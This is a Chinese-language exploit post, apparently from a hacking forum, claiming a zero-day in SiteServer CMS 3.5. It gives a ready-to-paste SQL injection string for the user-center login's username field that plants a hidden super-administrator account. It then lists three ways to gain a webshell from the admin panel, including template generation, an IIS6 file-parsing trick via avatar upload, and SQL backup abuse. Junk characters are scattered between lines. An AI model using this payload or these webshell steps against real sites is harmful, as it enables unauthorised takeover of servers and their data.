SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
* F/ U7 O, ?$ \, t
stieserver官网:www.siteserver.cn
) @$ [, F3 s) {: J$ L, C, H7 t


5 I' ]" b$ H# J( {EXP:
5 H' |$ ^7 D* d8 r" l) X2 P. `& s
2 G: A" ^; L4 X: y直接访问UserCenter/login.aspx

; L3 z% Q0 f) w: {  X
; P6 {* ]6 f. Q) S" n) |3 m! M
用户名处输入：
; B4 n- Y; e+ g# A
6 F6 r: R  l* L* i7 g123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
/ ]" X0 W2 e$ M; N! x- @
! U) Z7 P' C, N' \/ p  k' u! Y% m

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
% [1 P4 Q* F$ C8 E: ]# g( ^; @

9 z) r1 R& \6 H
, Y/ K- G7 s2 W! t8 g& O" ?. k之后再访问后台SiteServer/login.aspx用插入的用户登陆


! g6 m7 m& s4 M! w: f! t
后台拿webshell的三种方法：

一、
- A+ B" e) E0 t- w' P6 H
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

4 L  y) ]4 b6 Q+ i: R  ~! f成员权限-》添加用户-》用户名为：1.asp

" B2 [$ W& Z7 l# N% Q" khttp://127.0.0.1/usercenter/
7 h7 I( T1 @# C: H& i# M
4 A- v' r: F- Y( J9 n# E用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
* f9 t6 m- F% ~$ A  Y- ^
$ p2 F2 `9 w2 _$ g2 ^; D（ps：后台添加用户时不会验证是否含有非法字符）
- I8 }2 [$ E: t/ {' W
三、
) A% g* ]) ]- d# o
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
( q2 O& x3 p3 [  R7 g+ X
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

$ L& m' W+ m$ q* U2 q3 F  ], A